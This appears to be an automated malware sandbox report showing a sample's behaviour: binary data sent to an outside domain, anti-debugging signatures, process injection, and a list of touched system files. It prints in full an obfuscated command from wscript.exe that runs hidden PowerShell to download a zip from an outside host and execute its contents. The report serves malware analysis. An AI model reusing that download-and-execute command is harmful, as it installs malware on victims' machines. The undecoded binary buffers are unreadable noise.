‡Rì=üuÓ$šT¢˜õò¬û¸n㚟ÔçÆĨ_;À8ÃÂp&jþ;]’ô­ß[BxvWì÷gyô3ÔíÝæéáÖ|±J"²$âM÷’ºnŸÅíTYƒÑ"ƒÁnä~"ÖÕxÆW’?Œ‡‘a‚üt*œ}ÅøÕ¸îˆÀ¼¤ å6#D |‡á؀ ü Æ­@ k8áÀlٝ NŒÄà­I2ào¿Ø*ä IÓËSjåå£uÍßƆ‘®=;õœM‘_ÕÌ2µå¤1V{¹PZí=Æ˨uàlj2™¶þ=s¥5¿’@xŒkréú ˜7\R•ÍEû±@î@GÄßÀhpÞ-N7ÝŒ“)ò£fæ…óÔ t*¼É†0,Õ¤r¿–åðGØ1üG«ÞÇö=íµ 'Á6û¸zŽŠqp™B×ò ƉÁµŸÞù¿Õ¿;xE¥œ<<ÏÌ¢h\ê â ÎùŠ»§[Úp iÁ03'ΊXŠò±••?ë­â6¢‡Øv—ó°láúß›¢;óÈ9çl«%½Q÷U”Òù¦™\(" üJJ1X@Ó ƒ9›Ae׎Õ¦×]Ø^ÖÑBÈ­:dB’F¼¿Ó£”}{­` ûˆ8Ì[ŸJzW¬þ†Q Ç@—œ Kqç±Ýž#–]Ú*`²áH¹Œ
Data sent pld‚kŒ?ZulUƒ×&eÚY.‹œ²ðmöèž.JÃø@î‘/5 ÀÀÀ À 28+ÿ fuelrescue.ie  
Data sent  òˆ›k3LGN·ø\ª8½ãÙÏÃz¡Š×ƒ·3ȋø^ öâªÿ—ê¡x›‘¬Dð­é¨‚ÞßbíA=øѽݑ­æ" Պâ…|³üd} ’úÞ©ë=RIÅ H4‚ù7ˆÌò}Nwƒ V7=æn¦æ´Ïw@fNÑådìɂ ­j"îˆp* ¦uàæÖÝ8¤ž¸7èNÆ7æ;r…¯‹x»ðñ]@Vý2- €:"AyLjÕgH½W5ž´®ÊL•ÓÛì%7:NҔ™×U!_ ?õÚK³a4Á¯,ߎØÁ‹0V´½.tå•á¤¼gglRÕlø@0°¢/…ìH!R.1ñ؃…º){Â3& ïûö!¢Ü"WE‚—›ò¬¡BìXÞHZ¶À
Data sent €4ÖrH¬ñ$USË´¦•^íK9™¹Cá“y‘Š”Œ®ñ²zÆÃ$-ZÌy›ŸüÍò❥ÒI©,©Rm§•¯;ÅÞT'ŽJऻüÚ]£/¿¢2wœJv´^øC³Êõ†µØXkǹµË- F‡ßӃ9}Çm3½©ºEútÚÿ
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

send

buffer: pld‚kŒ?ZulUƒ×&eÚY.‹œ²ðmöèž.JÃø@î‘/5 ÀÀÀ À 28+ÿ fuelrescue.ie  
socket: 1408
sent: 117
1 117 0

send

buffer:  òˆ›k3LGN·ø\ª8½ãÙÏÃz¡Š×ƒ·3ȋø^ öâªÿ—ê¡x›‘¬Dð­é¨‚ÞßbíA=øѽݑ­æ" Պâ…|³üd} ’úÞ©ë=RIÅ H4‚ù7ˆÌò}Nwƒ V7=æn¦æ´Ïw@fNÑådìɂ ­j"îˆp* ¦uàæÖÝ8¤ž¸7èNÆ7æ;r…¯‹x»ðñ]@Vý2- €:"AyLjÕgH½W5ž´®ÊL•ÓÛì%7:NҔ™×U!_ ?õÚK³a4Á¯,ߎØÁ‹0V´½.tå•á¤¼gglRÕlø@0°¢/…ìH!R.1ñ؃…º){Â3& ïûö!¢Ü"WE‚—›ò¬¡BìXÞHZ¶À
socket: 1408
sent: 326
1 326 0

send

buffer: €4ÖrH¬ñ$USË´¦•^íK9™¹Cá“y‘Š”Œ®ñ²zÆÃ$-ZÌy›ŸüÍò❥ÒI©,©Rm§•¯;ÅÞT'ŽJऻüÚ]£/¿¢2wœJv´^øC³Êõ†µØXkǹµË- F‡ßӃ9}Çm3½©ºEútÚÿ
socket: 1408
sent: 133
1 133 0
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://fuelrescue.ie/wp/','%temp%/jly79.zip'); Expand-Archive -Path %temp%/jly79.zip -DestinationPath %temp%; & %temp%/1.exe & XPZiglnScTRWqeE
parent_process wscript.exe martian_process cmd.exe /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://fuelrescue.ie/wp/','%temp%/jly79.zip'); Expand-Archive -Path %temp%/jly79.zip -DestinationPath %temp%; & %temp%/1.exe & XPZiglnScTRWqeE
Process injection Process 3048 resumed a thread in remote process 1784
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000034c
suspend_count: 1
process_identifier: 1784
1 0 0
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -w hidden value Attempts to execute command with a hidden window
value Uses powershell to execute a file download from the command line
file C:\Windows\System32\cmd.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe